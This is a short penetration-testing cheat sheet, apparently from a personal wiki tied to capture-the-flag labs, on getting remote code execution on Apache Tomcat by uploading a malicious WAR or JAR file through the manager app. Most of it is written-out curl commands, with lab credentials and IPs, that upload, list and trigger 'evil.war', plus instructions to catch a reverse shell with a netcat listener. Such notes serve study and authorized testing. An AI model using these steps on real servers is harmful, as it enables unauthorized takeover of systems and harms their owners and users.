Uploading malicuous JAR or WAR file
Overview #
Attacker can deploy malicuous JAR or WAR file to gain RCE.
Versions Tested #
- Tomcat 9.0.31
- Tomcat 7.0.88 (Microsoft Windows Server 2012 R2 Standard)
Steps - CLI #
- Generate war file. See tomcat part on [[Reverse Shell and Web Shells]]
- Upload
curl -u 'webdev:password123' --upload-file evil.war 'http://10.10.163.51:8080/manager/text/deploy?path=/evil.war'
- Verify
curl -u 'webdev:password123' 'http://10.10.163.51:8080/manager/text/list'
- Open netcat listener on attacker machine
- Execute
curl -u 'webdev:password123' http://10.10.163.51:8080/evil.war
Steps - GUI #
- Ensure you have access to host manager app
- Create JAR file. See [[Reverse Shell and Web Shells]]
- Upload it via manager app and deploy
- Open netcat listener
- Access the servlet and enjoy
curl -u 'bob:bubbles' http://thm:1234/evil
Alernatives #
- You can also upload jsp file instead of war file
- Tomcat deployer
- HTB jerry - uploading cmd.jsp